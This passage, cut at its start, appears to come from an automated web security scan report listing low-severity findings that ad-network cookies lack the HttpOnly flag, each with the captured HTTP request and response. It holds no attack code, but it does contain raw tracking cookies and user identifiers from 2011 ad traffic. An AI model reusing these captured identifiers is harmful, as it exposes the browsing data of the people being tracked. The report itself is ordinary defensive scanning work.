uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:51:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0026.rm.ac4
Set-Cookie: ih="b!!!!(!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1,+^!!!!#<uwIy!1UC(!!!!#<u]FZ"; path=/; expires=Wed, 10-Apr-2013 16:51:19 GMT
Set-Cookie: vuday1=d-=>Rd-=>R!4)FWKw-DF; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=fh'jT!4)FW(/$tL; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:51:19 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?2,13%3B5855ce95097310b4%3B12f457979eb,0%3B%3B%3B2115988955,wT8nBQNzEgDYMYQAAAAAACXAIgAAAAAAAgAAAAIAAAAAAP8AAAACDMxcHgAAAAAAyY
...[SNIP]...
6.34. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1050693&id=845380&id=1220655&id=1257631&id=916980&id=736181&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!$!/cM[!!!!#<uB1*!0Qau!!!!#<tePk"; pv1="b!!!!$!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~"; bh="b!!!!l!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!$#r<!!!!#<td)R"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 302 Found
Date: Sat, 09 Apr 2011 12:30:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!r!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#xu[!!!!#<u]Bd!$#r<!!!!#<td)R!$'(]!!!!#<u]Bd"; path=/; expires=Mon, 08-Apr-2013 12:30:13 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=f_U9CKWqjAIQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 12:30:13 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

6.35. http://ad.yieldmanager.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=902030&id=1062338&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; vuday1=j5M]9!>zo]2r<p+; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#B!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!$<u]Fa!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!$<u]Fa!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#.dO!!!!$<u]Fa!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#M]c!!!!$<u]Fa!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!$<u]Fa!#Q+^!!!!$<u]Fa!#Q+o!!!!$<u]Fa!#Q+p!!!!$<u]Fa!#Q,.!!!!$<u]Fa!#RY.!!!!$<u]Fa!#SCj!!!!$<u]Fa!#SCk!!!!$<u]Fa!#XA!!!!!$<u]Fa!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#]W%!!!!$<u]Fa!#^Bo!!!!$<u]Fa!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#a,x!!!!$<u]Fa!#a3k!!!!$<u]Fa!#aG>!!!!$<u]Fa!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#eU%!!!!$<u]Fa!#eaO!!!!$<u]Fa!#f8c!!!!$<u]Fa!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gHm!!!!$<u]Fa!#g[h!!!!$<u]Fa!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#l*=!!!!$<u]Fa!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!$<u]Fa!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#ust!!!!$<u]Fa!#usu!!!!$<u]Fa!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!$<u]Fa!#wmL!!!!$<u]Fa!#wnK!!!!$<u]Fa!#wnM!!!!$<u]Fa!#xI*!!!!$<u]Fa!#xu[!!!!#<u]Bd!#yM#!!!!$<u]Fa!$#WA!!!!$<u]Fa!$#r<!!!!#<td)R!$$LL!!!!#<u]Fb!$%,!!!!!$<u]Fa!$%SB!!!!$<u]Fa!$'(]!!!!#<u]Bd"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:33:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#B!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!$<u]Fa!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!$<u]Fa!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#.dO!!!!$<u]Fa!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-~~!#M]c!!!!$<u]Fa!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!$<u]Fa!#Q+^!!!!$<u]Fa!#Q+o!!!!$<u]Fa!#Q+p!!!!$<u]Fa!#Q,.!!!!$<u]Fa!#RY.!!!!$<u]Fa!#SCj!!!!$<u]Fa!#SCk!!!!$<u]Fa!#XA!!!!!$<u]Fa!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#]W%!!!!$<u]Fa!#^Bo!!!!$<u]Fa!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#a,x!!!!$<u]Fa!#a3k!!!!$<u]Fa!#aG>!!!!$<u]Fa!#aH+!!!!#<u]Bd!#c%+~~!#eRM!!!!#<tdei!#eU%!!!!$<u]Fa!#eaO!!!!$<u]Fa!#f8c!!!!$<u]Fa!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gHm!!!!$<u]Fa!#g[h!!!!$<u]Fa!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#l*=!!!!$<u]Fa!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!$<u]Fa!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#ust!!!!$<u]Fa!#usu!!!!$<u]Fa!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!$<u]Fa!#wmL!!!!$<u]Fa!#wnK!!!!$<u]Fa!#wnM!!!!$<u]Fa!#xI*!!!!$<u]Fa!#xu[!!!!#<u]Bd!#yM#!!!!$<u]Fa!$#WA!!!!$<u]Fa!$#r<!!!!#<td)R!$$LL!!!!#<u]Fb!$%,!!!!!$<u]Fa!$%SB!!!!$<u]Fa!$'(]!!!!#<u]Bd"; path=/; expires=Mon, 08-Apr-2013 13:33:56 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 13:33:56 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
6.36. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:19 GMT
Expires: Mon, 11 Apr 2011 16:31:19 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NmZC-t7Z; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:19 GMT; Path=/
Content-Length: 164
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3406242120278446565"/>');
6.37. http://admonkey.dapper.net/AdBriteUIDMonster  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /AdBriteUIDMonster

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdBriteUIDMonster?redirect=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F779045%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Host: admonkey.dapper.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Sat, 09 Apr 2011 12:35:48 GMT
Connection: keep-alive
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: uid=15659238881209613; Expires=Thu, 06-Oct-2011 12:35:48 GMT
Location: http://ads.adbrite.com/adserver/vdi/779045?d=15659238881209613
Content-Length: 0

6.38. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1302352256751 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6740737079467195442__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 579

jsonp1302352256751({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirec
...[SNIP]...
6.39. http://ads.adap.tv/cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /cookie

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://www.wptz.com/news/27483035/detail.html&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="724771479354552954__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/html
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8;Path=/;Domain=.adap.tv
Content-Length: 0
Server: Jetty(6.1.22)

6.40. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:35:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052ad@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:57 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:57 GMT
Content-Length: 0

6.41. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b2@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:02 GMT
